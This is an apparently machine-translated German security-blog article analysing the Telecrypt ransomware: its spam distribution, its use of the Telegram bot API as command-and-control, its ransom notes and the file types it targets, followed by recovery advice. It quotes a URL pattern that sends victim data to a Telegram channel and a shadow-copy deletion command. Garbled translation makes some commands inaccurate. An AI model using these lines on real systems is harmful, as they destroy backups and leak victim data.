Entfernen Telecrypt Viren und Wiederherstellen von Dateien .Xcri - Wie, Technologie und PC Security Forum | SensorsTechForum.com
BEDROHUNG ENTFERNT

Entfernen Telecrypt Viren und Wiederherstellen von Dateien .Xcri

stf-telecrypt-Ransomware-Telegramm-crypt-Virus-Gruß-your-Dateien-are-crypted

Telecrypt ist wie ein neues cryptovirus von Malware-Forscher genannt wurde wegen seiner Verwendung von Telegramm Kanäle. Die verschlüsselten Dateien wird die Erweiterung .Xcri nach ihrem Namen platziert. Ein Fenster öffnet sich, nachdem der Verschlüsselungsvorgang abgeschlossen ist, enthält das Löse Nachricht, die in russischer Sprache. Um zu sehen, wie diese Ransomware zu entfernen und wie Sie versuchen können, Ihre Dateien wiederherstellen, Lesen Sie den Artikel bis zum Ende.

Threat Zusammenfassung

NameTelecrypt
ArtRansomware, Cryptovirus
kurze BeschreibungDie Ransomware wird Ihre Dateien verschlüsseln und dann mit dem Erpresserbrief und Anweisungen für die Zahlung völlig geschrieben in Russisch ein Fenster angezeigt.
SymptomeVerschlüsselte Dateien die Erweiterung erhalten .Xcri nach ihrem Namen angehängt.
VerteilungsmethodeSpam-E-Mails, E-Mail-Anhänge
Detection Tool Prüfen Sie, ob Ihr System von Telecrypt betroffen

Herunterladen

Malware Removal Tool

BenutzererfahrungAbonnieren Sie unseren Forum zu Besprechen Telecrypt.
Data Recovery-ToolWindows Data Recovery von Stellar Phoenix Beachten! Dieses Produkt scannt Ihr Laufwerk Sektoren verlorene Dateien wiederherzustellen, und es kann sich nicht erholen 100% der verschlüsselten Dateien, aber nur wenige von ihnen, je nach Situation und ob Sie das Laufwerk neu formatiert haben.

Telecrypt Virus - Verbreitung

Die Telecrypt Ransomware könnte Ihr Computer-Maschine in ein paar Möglichkeiten geben. Die Nutzlast-Datei verbreiten durch Spam-E-Mails werden könnte. Oft, Diese Spam-Mails haben eine angehängte Datei und als wichtig und sofortige Maßnahmen erfordern vorgestellt. Für den Fall, öffnen Sie den Anhang, es wird die Malware auf Ihrem Computer-System freigeben.

Die Telecrypt Virus kann Ihren Computer durch die Verbreitung seiner Datei mit der Nutzlast über Social Media und File-Sharing-Dienste infizieren. Öffnen Sie keine Dateien, die mit verdächtigen E-Mails kommen, Links oder aus unbekannten Quellen. Bevor Sie sie öffnen, Sie sollten zunächst einen Scan mit einem Sicherheitsprogramm durchführen und die Dateien überprüfen, ihre Größe und Unterschriften. Sie sollten das lesen Tipps zur Vermeidung von Ransomware aus dem Thema in unserem Forum.

Telecrypt Virus - Analyse

Die Telecrypt Virus wurde von Kaspersky Malware-Forscher fanden heraus, die es auf diese Weise synchronisiert. Der Name leitet sich von der Tatsache abgeleitet, dass es Telegramm Kanäle als C2 verwendet (Befehl&Steuerung) Server. Die Ransomware ist im Delphi-Programmiersprache codiert, und es ist nicht die erste Malware in dieser Sprache codiert.

Vor dem Telecrypt Virus beginnt die Verschlüsselung von Dateien, es führt eine Reihe von Aktionen. Erstens, es entsteht ein Telegramm bietet durch das Telegramm API. Diese API erzeugt ein Token-ID für jeden neuen Bot, die erstellt wird. Zweitens, wenn Sie das Telegramm binäre starten, Pings die cryptovirus die zuvor erwähnte API an der Adresse, https://api.telegram.org/bot/GetMe mit dem empfangenen Token. Das wird durchgeführt, um zu überprüfen, ob der Bot noch aktiv ist und nicht durch Telegramm Administratoren verboten.

Nachher, die Telecrypt Ransomware verwendet das Protokoll Programm eine Nachricht an einen Telegramm-Kanal posten, das hat eine ID in der cryptovirus einprogrammiert. Das Format der Nachricht ist die folgende:

→https://api.telegram.org/bot< token >/Nachricht senden?chat_id =< chat >&text =< computer_name >_< infection_id >_< key_seed >

Quelle: BleepingComputer

Dieser Befehl wird die Cyber-Kriminellen Informationen wie ein C2-Server erhalten. Die Informationen enthalten:

  • Die Namen der infizierten Computern
  • IDs dieser kompromittierten Maschinen
  • Token-IDs des kompromittierten PCs
  • Key Seed die Zeichenfolge Nummer enthält, die für die Erzeugung des Dateiverschlüsselungsschlüssels verwendet

Danach, die Telecrypt Ransomware sucht verschiedene Dateien zu verschlüsseln.

Das folgende Verzeichnis enthält Informationen über die Dateien, die das Virus auf Ihrem Computer verschlüsseln:

→%USERPROFILE% Desktop Datenbank verschlüsseln faylov.txt

Wenn der Verschlüsselungsprozess abgeschlossen ist, Sie wird ein Fenster mit Informationen sehen. Diese Information wird in russischer Sprache geschrieben, aber es ist die eigentliche Nachricht Löst. Sie können einen Screenshot von dieser Nachricht sehen hier:

stf-telecrypt-Ransomware-Telegramm-crypt-Virus-Gruß-your-Dateien-are-crypted

Es liest die folgende:

Eine Verknüpfung zu dem Desktop!
Guten Tag! Wir brachen in den Computer! Alle Ihre Dateien Formate: doc, xls, jpg, jpeg, png, pdf, 1c Basis, Wir sind jetzt verschlüsselt. Sie können es direkt überprüfen Hieb!!! Was Sie tun?
1) Sie können das Programm yarlk löschen, aber es ist nicht
Hilfe.
2) Sie können den Master nennen, aber es hilft nicht(Dateien können nicht rashifrovany ohne Spezialschlüssel bty).
3) Sie können Windows neu installieren, aber es hilft nicht(alle
Ihre Dateien werden gelöscht).
4) Sie können unten klicken…

Eine grobe Übersetzung in Englisch liest:

Die Verknüpfung wird hinzugefügt, um Ihren Desktop!
Hallo! Wir brachen in den Computer! Alle Ihre Dateiformate: doc, xls, jpg, jpeg, png, pdf, 1c Base werden nun verschlüsselt. Sie können es jetzt überprüfen!!! Wie geht's?
1) Sie können dieses Programm entfernen, aber es wird nicht helfen.
2) Sie können den Master nennen, aber das nicht hilft (Dateien können nicht ohne einen speziellen Schlüssel entschlüsselt werden).
3) Sie können Windows neu installieren, aber es hilft nicht (alle
Ihre Dateien werden entfernt).
4) Sie können neben klicken Sie …

Wenn Sie auf den Button klicken weiter / Nächster, Sie erhalten 2 mehr Fenster:

stf-telecrypt-Ransomware-Telegramm-crypt-Virus-Lösegeld-Preis-Leistungs-Schlüssel

und

stf-telecrypt-Ransomware-Telegramm-crypt-Virus-id-how-to-unlock

In den nächsten zwei Fenstern, das Cyber-Kriminellen zu erklären, dass sie wollen, um sie zu bezahlen 5000 Rubles - das Äquivalent von 50 US Dollar. Auch, Kaspersky Forscher sagen, dass der letzte Satz im letzten Fenster besagt Folgendes:

Vielen Dank für die jungen Programmierer Fund.

Du solltest NICHT denken Sie an die Zahlung, wie es zu tun einige Script-Kiddies oder andere Cyber-Kriminelle könnten unterstützen. Niemand kann Ihnen garantieren, dass die Zahlung Ihre Dateien in ihren Normalzustand zurückkehren. Zudem, die Gauner werden wahrscheinlich das Geld verwenden, um mehr Ransomware zu erstellen.

Die Telecrypt Ransomware werden die Dateien verschlüsseln und setzen .Xcri als neue Dateierweiterung. Die folgende Liste enthält die Dateierweiterungen, die das Virus sucht zu verschlüsseln:

→.doc, .docx, .jpg, .jpeg, .pdf, .png, .dt, .xls, .xlsx, .CD, .dbf

Nur die 11 Erweiterungen erhalten verschlüsselt, aber das sind mehr als genug, um Ihnen eine große Kopfschmerzen zu verursachen. Die Telecrypt Virus ist sehr wahrscheinlich, das zu löschen Schatten Volume-Kopien aus dem Windows-Betriebssystem, indem Sie den folgenden Befehl:

→Vssadmin.exe löschen Schatten / all / Quiet

Weiter zu lesen und sehen, welche Art von Methoden, die Sie für die Wiederherstellung der Dateien können versuchen,.

Entfernen Telecrypt und Wiederherstellen von Dateien .Xcri

Wenn bekam Ihren Computer mit dem infizierten Telecrypt Ransomware, Sie sollten Malware entfernen einige Erfahrung. Sie sollten so schnell wie möglich loswerden dieser Ransomware, bevor es die Chance, weiter zu verbreiten haben können und mehr Computer infizieren. Sie sollten die Ransomware entfernen und die Schritt-für-Schritt-Anleitung Anleitung unten folgen. Um zu sehen, Möglichkeiten, die Sie versuchen können, Ihre Daten wiederherzustellen, siehe den Schritt betitelte 2. Wiederherstellen von Dateien verschlüsselt durch Telecrypt.

Avatar

Berta Bilbao

Berta ist ein spezieller Malware-Forscher, Träumen für eine sichere Cyberspace. Ihre Faszination für die IT-Sicherheit begann vor ein paar Jahren, wenn eine Malware sie aus ihrem eigenen Computer gesperrt.

Mehr Beiträge

Schreibe einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

Frist ist erschöpft. Bitte laden CAPTCHA.

Auf Facebook teilen Teilen
Loading ...
Empfehlen über Twitter Tweet
Loading ...
Share on Google Plus Teilen
Loading ...
Share on Linkedin Teilen
Loading ...
Empfehlen über Digg Teilen
Teilen auf Reddit Teilen
Loading ...
Empfehlen über Stumbleupon Teilen
Loading ...